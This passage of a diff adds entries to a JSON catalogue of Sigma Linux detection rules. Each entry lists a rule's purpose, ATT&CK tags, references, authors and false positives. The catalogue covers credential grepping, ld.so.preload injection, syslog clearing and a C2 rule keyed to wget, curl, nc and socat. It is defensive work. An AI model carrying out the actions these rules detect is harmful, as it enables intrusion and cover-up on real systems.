"lnx_auditd_dd_delete_file.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "low", + "falsepositive": [ + "Appending null bytes to files.", + "Legitimate overwrite of files." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.", + "uuid": "53059bc0-1472-438b-956a-7508a94a91f0", + "value": "Disable System Firewall", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://attack.mitre.org/techniques/T1562/004/", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" + ], + "tags": [ + "attack.t1562.004", + "attack.defense_evasion" + ], + "creation_date": "2022/01/22", + "filename": "lnx_auditd_disable_system_firewall.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects file and folder permission changes.", + "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "value": "File or Folder Permissions Change", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ], + "creation_date": "2019/09/23", + "filename": "lnx_auditd_file_or_folder_permissions.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "low", + "falsepositive": [ + "User interacting with files permissions (normal/daily behaviour)." 
+ ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detecting attempts to extract passwords with grep", + "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", + "value": "Credentials In Files - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_find_cred_in_files.yml", + "author": "Igor Fits, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", + "uuid": "d08722cd-3d09-449a-80b4-83ea2d9d4616", + "value": "Hidden Files and Directories", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://attack.mitre.org/techniques/T1564/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_files_directories.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2021/09/06", + "filename": "lnx_auditd_hidden_files_directories.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects appending of zip file to image", + "uuid": "45810b50-7edc-42ca-813b-bdac02fb946b", + "value": "Steganography Hide Zip Information in Picture File", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", 
+ "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/09", + "filename": "lnx_auditd_hidden_zip_files_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect attempt to enable auditing of TTY input", + "uuid": "49aae26c-450e-448b-911d-b3c13d178dfc", + "value": "Linux Keylogging with Pam.d", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/T1056.001.md", + "https://attack.mitre.org/techniques/T1003/", + "https://linux.die.net/man/8/pam_tty_audit", + "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing", + "https://access.redhat.com/articles/4409591#audit-record-types-2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1056.001" + ], + "creation_date": "2021/05/24", + "filename": "lnx_auditd_keylogging_with_pam_d.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Administrative work" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Identifies modification of ld.so.preload for shared object injection. 
This technique is used by attackers to load arbitrary code into processes.", + "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "value": "Modification of ld.so.preload", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.006" + ], + "creation_date": "2019/10/24", + "filename": "lnx_auditd_ld_so_preload_mod.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "value": "Loading of Kernel Module via Insmod", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1547/006/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.006" + ], + "creation_date": "2021/11/02", + "filename": "lnx_auditd_load_module_insmod.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Unknown" + ], + 
"logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect changes of syslog daemons configuration files", + "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", + "value": "Logging Configuration Changes on Linux Host", + "meta": { + "refs": [ + "self experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ], + "creation_date": "2019/10/25", + "filename": "lnx_auditd_logging_config_change.yml", + "author": "Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "value": "Masquerading as Linux Crond Process", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_masquerading_crond.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local or remote network services.", + "uuid": "3761e026-f259-44e6-8826-719ed8079408", + "value": "Linux Network 
Service Scanning - Auditd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/10/21", + "filename": "lnx_auditd_network_service_scanning.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", + "value": "Network Sniffing - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_network_sniffing.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." 
+ ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", + "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ], + "creation_date": "2021/09/17", + "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." 
+ ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects password policy discovery commands", + "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "value": "Password Policy Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://attack.mitre.org/techniques/T1201/", + "https://linux.die.net/man/1/chage", + "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ], + "creation_date": "2020/10/08", + "filename": "lnx_auditd_password_policy_discovery.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community, Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects a reload or a start of a service.", + "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "value": "Systemd Service Reload or Start", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ], + "creation_date": "2019/09/23", + "filename": "lnx_auditd_pers_systemd_reload.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "low", + "falsepositive": [ + "Installation of legitimate service.", + "Legitimate reconfiguration of service." 
+ ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "value": "Screen Capture with Import Tool", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2021/09/21", + "filename": "lnx_auditd_screencapture_import.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects adversary creating screen capture of a full with xwd. 
Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "value": "Screen Capture with Xwd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/xwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2021/09/13", + "filename": "lnx_auditd_screencaputre_xwd.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "value": "Split A File Into Pieces - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_split_file_into_pieces.yml", + "author": "Igor Fits, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "value": "Steganography Hide Files with 
Steghide", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/11", + "filename": "lnx_auditd_steghide_embed_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "value": "Steganography Extract Files with Steghide", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/11", + "filename": "lnx_auditd_steghide_extract_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol 
(T1095), Data Encoding (T1132)\n", + "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "value": "Suspicious C2 Activities", + "meta": { + "refs": [ + "https://github.com/Neo23x0/auditd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2020/05/18", + "filename": "lnx_auditd_susp_c2_commands.yml", + "author": "Marie Euler", + "level": "medium", + "falsepositive": [ + "Admin or User activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects relevant commands often related to malware or hacking activity", + "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "value": "Suspicious Commands Linux", + "meta": { + "refs": [ + "Internal Research - mostly derived from exploit code including code in MSF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2017/12/12", + "filename": "lnx_auditd_susp_cmds.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", + "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "value": "Program Executions in Suspicious Folders", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" + ], + "tags": [ + "attack.t1587", + "attack.t1584", + "attack.resource_development" + ], + "creation_date": "2018/01/23", + "filename": "lnx_auditd_susp_exe_folders.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Admin activity (especially in /tmp folders)", + "Crazy 
web applications" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects commandline operations on shell history files", + "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", + "value": "Suspicious History File Operations - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ], + "creation_date": "2020/10/17", + "filename": "lnx_auditd_susp_histfile_operations.yml", + "author": "Mikhail Larin, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "value": "Systemd Service Creation", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ], + "creation_date": "2022/02/03", + "filename": "lnx_auditd_systemd_service_creation.yml", + "author": "Pawel Mazur", + "level": "medium", + "falsepositive": [ + "Admin work like legit service installs." 
+ ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects System Information Discovery commands", + "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "value": "System Information Discovery - Auditd", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1082/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2021/09/03", + "filename": "lnx_auditd_system_info_discovery.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects system information discovery commands", + "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "value": "System and Hardware Information Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2020/10/08", + "filename": "lnx_auditd_system_info_discovery2.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", + "value": "System Shutdown/Reboot - 
Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_system_shutdown_reboot.yml", + "author": "Igor Fits, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects extracting of zip file from image file", + "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "value": "Steganography Unzip Hidden Information From Picture File", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/09", + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "value": "System Owner or User Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_user_discovery.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects possible command execution by web application/web shell", + "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "value": "Webshell Remote Command Execution", + "meta": { + "refs": [ + "Personal Experience of the Author", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/10/12", + "filename": "lnx_auditd_web_rce.yml", + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "level": "critical", + "falsepositive": [ + "Admin activity", + "Crazy web applications" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "value": "Equation Group Indicators", + "meta": { + "refs": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059.004" + ], + "creation_date": "2017/04/09", + "filename": "lnx_apt_equationgroup_lnx.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects buffer overflow attempts in Unix system log files", + "uuid": 
"18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", + "value": "Buffer Overflow Attempts", + "meta": { + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" + ], + "tags": [ + "attack.t1068", + "attack.privilege_escalation" + ], + "creation_date": "2017/03/01", + "filename": "lnx_buffer_overflows.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog", + "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", + "value": "Commands to Clear or Remove the Syslog - Builtin", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ], + "creation_date": "2021/09/10", + "filename": "lnx_clear_syslog.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Log rotation" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious modification of crontab file.", + "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "value": "Modifying Crontab", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ], + "creation_date": "2022/04/16", + "filename": "lnx_crontab_file_modification.yml", + "author": "Pawel Mazur", + "level": "medium", + 
"falsepositive": [ + "Legitimate modification of crontab" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the use of tools that copy files from or to remote systems", + "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", + "value": "Remote File Copy", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1105/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1105" + ], + "creation_date": "2020/06/18", + "filename": "lnx_file_copy.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "value": "Code Injection by ld.so Preload", + "meta": { + "refs": [ + "https://man7.org/linux/man-pages/man8/ld.so.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" + ], + "creation_date": "2021/05/05", + "filename": "lnx_ldso_preload_injection.yml", + 